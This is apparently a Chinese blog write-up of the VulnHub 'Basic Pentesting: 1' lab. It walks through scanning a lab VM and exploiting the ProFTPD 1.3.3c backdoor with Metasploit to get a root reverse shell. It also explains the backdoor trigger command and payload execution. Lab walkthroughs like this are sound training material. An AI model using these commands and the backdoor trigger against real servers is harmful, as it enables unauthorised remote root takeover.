当前位置: 首页 > news >正文

Basic Pentesting: 1靶场渗透

Basic Pentesting: 1

来自 <Basic Pentesting: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.135

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.135

 

4,尝试匿名访问ftp服务器

失败,然后在尝试访问web服务

默认页面,尝试枚举扫描爆破其网站子目录

gobuster dir -u http://192.168.23.135/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

看到子网页特征就知道是wordpress建站

http://192.168.23.135/secret/

识别网站指纹特征

whatweb -v http://192.168.23.135/secret/

接着再扫出子目录的子目录

gobuster dir -u http://192.168.23.135/secret -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

5,检索该版本wordpress存在的漏洞利用脚本

searchsploit wordpress 4.9

没有特别明显的漏洞,那么就可从插件的漏洞作为突破。使用专门扫描工具wpscan

wpscan --url http://192.168.23.135/secret

那就只能暂且搁置

6,尝试检索ftp服务的版本漏洞

searchsploit ProFTPD 1.3.3c 

直接就查出来存在后门命令执行漏洞,而且Metasploit存在攻击模块,那么直接使用之

msfconsole -q

search ProFTPD 1.3.3c

use exploit/unix/ftp/proftpd_133c_backdoor

然后查看需要配置的选项

options

set RHOSTS 192.168.23.135

set payload cmd/unix/reverse

set lhost 192.168.23.128

set lport 4444

run

居然直接变成了root用户。启动可交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

 

ProFTPD 1.3.3c 后门漏洞

漏洞背景

  • 2010 年 11 月 28 日到 12 月 2 日 之间,ProFTPD 官方源代码包(1.3.3c 版本)被攻击者篡改。
  • 篡改后的代码中添加了一个 隐藏后门,允许远程未经认证的用户在 FTP 服务进程(通常是 root 权限运行)下执行系统命令。
  • 这属于 源码供应链攻击后门植入远程命令执行

脚本关键逻辑解析

1. 模块定义

class Metasploit3 < Msf::Exploit::Remote
    include Msf::Exploit::Remote::Ftp

  • 这是一个 远程 exploit 模块,使用了 Metasploit 提供的 FTP 客户端接口。
  • Rank = ExcellentRanking,说明可靠性很高。

2. 核心利用点

sock.put("HELP ACIDBITCHEZ\r\n")
res = sock.get_once(-1,10)

  • 模块向目标 FTP 服务器发送一个特殊命令:
    HELP ACIDBITCHEZ
  • 这个命令是攻击者留在后门里的 触发关键词
  • 如果服务器响应不是标准 502(未实现),说明这个 ProFTPD 被后门篡改,可以继续攻击。

3. 命令执行

sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")

  • 一旦确认存在后门,脚本就可以直接发送任意系统命令。
  • 这里利用 nohup 让命令在后台执行,同时将输出重定向到 /dev/null,避免暴露。
  • payload.encoded 是 Metasploit 生成的攻击载荷(如反弹 shell)。
  • 由于 ProFTPD 进程通常由 root 权限运行,所以执行的 payload 就自动获得了 root 权限 → 直接提权

4. 建立会话

handler

  • 这一步启动 Metasploit 的会话处理器,等待被控主机的反弹连接。
  • 一旦连接成功,攻击者即可拿到一个交互式 shell。
     提权原理总结
  1. 供应链攻击 → ProFTPD 源码被植入后门。
  2. 后门命令触发 → HELP ACIDBITCHEZ 激活隐藏逻辑。
  3. 任意命令执行 → FTP 服务进程直接执行攻击者命令。
  4. root 提权 → 因为 ProFTPD 常以 root 权限运行,payload 默认就是 root 权限。
  5. 远程控制 → 反弹 shell 回到攻击者,完成全权限接管。

关键点

  • 这不是“正常漏洞”,而是 恶意代码注入(后门)
  • 本质是攻击者利用开发方被入侵,篡改了源代码,导致任何安装该版本的人自动中招。
  • 这种利用 无需用户名密码认证,直接远程 root。
  • 提权环节不是本地溢出或提权链,而是 服务本身默认 root 运行造成的。


文章转载自:

http://MIBsSfY5.Lhrcr.cn
http://38lkp2le.Lhrcr.cn
http://vHGeBHtN.Lhrcr.cn
http://DxtG1nLU.Lhrcr.cn
http://My20RKCv.Lhrcr.cn
http://IiIFqQlI.Lhrcr.cn
http://jwPwfiN2.Lhrcr.cn
http://mLm5E6B6.Lhrcr.cn
http://oQfm4HDk.Lhrcr.cn
http://zi1LVydm.Lhrcr.cn
http://jkyhmTef.Lhrcr.cn
http://ZFpppN4z.Lhrcr.cn
http://lHJyTxLf.Lhrcr.cn
http://ufWiC8hV.Lhrcr.cn
http://F6OeItvm.Lhrcr.cn
http://1Z0C5Ylm.Lhrcr.cn
http://YOOSagTB.Lhrcr.cn
http://Yl3DB53r.Lhrcr.cn
http://GZ44VSsU.Lhrcr.cn
http://lD6biAJd.Lhrcr.cn
http://LMv7TRtF.Lhrcr.cn
http://WitidI3G.Lhrcr.cn
http://a89h7SCU.Lhrcr.cn
http://kUcDO10D.Lhrcr.cn
http://zywotaoE.Lhrcr.cn
http://k8OBap3i.Lhrcr.cn
http://GgKNLL2J.Lhrcr.cn
http://kZRtrtjJ.Lhrcr.cn
http://wzgEtzFY.Lhrcr.cn
http://e0sL23rX.Lhrcr.cn
http://www.dtcms.com/a/372200.html

相关文章:

  • NAS自建笔记服务leanote2
  • 对比Java学习Go——程序结构与变量
  • 【JavaWeb】一个简单的Web浏览服务程序
  • [C/C++学习] 7.“旋转蛇“视觉图形生成
  • webhook(Web 钩子)是什么?
  • 《2025年AI产业发展十大趋势报告》四十三
  • java面试小册(1)
  • NW506NW507美光固态闪存NW525NW539
  • [Maven 基础课程]再看下第一个 Maven 项目
  • Keil快捷键代码补全
  • 2024理想算法岗笔试笔记
  • Java面试-线程安全篇
  • 线程池深度解析:ThreadPoolExecutor底层实现与CompletableFuture异步编程实战
  • 计算机网络学习(七、网络安全)
  • 蓝奏云官方版不好用?蓝云最后一版实测:轻量化 + 不限速(避更新坑) 蓝云、蓝奏云第三方安卓版、蓝云最后一版、蓝奏云无广告管理工具、安卓网盘轻量化 APP
  • build.gradle里面dependencies compile和api的区别
  • C++20格式化字符串:std::format的使用与实践
  • UART 使用教程
  • cuda中线程id的计算方式(简单)
  • Archon02-代码解析
  • # 图片格式转换工具:重新定义您的图片处理体验
  • 【Python】S1 基础篇 P2 列表详解:基础操作
  • 液压伺服千斤顶系统设计cad+设计说明书
  • MySQL 锁机制解析
  • directive-plugin指令插件相关参数文档
  • 3D 版接雨水
  • (LeetCode 每日一题)1304. 和为零的 N 个不同整数(数组)
  • WebGL2初识
  • 浏览器兼容性问题全解:CSS 前缀、Grid/Flex 布局兼容方案与跨浏览器调试技巧
  • TI例程demo-ADC电压、电流采样的学习研究及硬件验证调试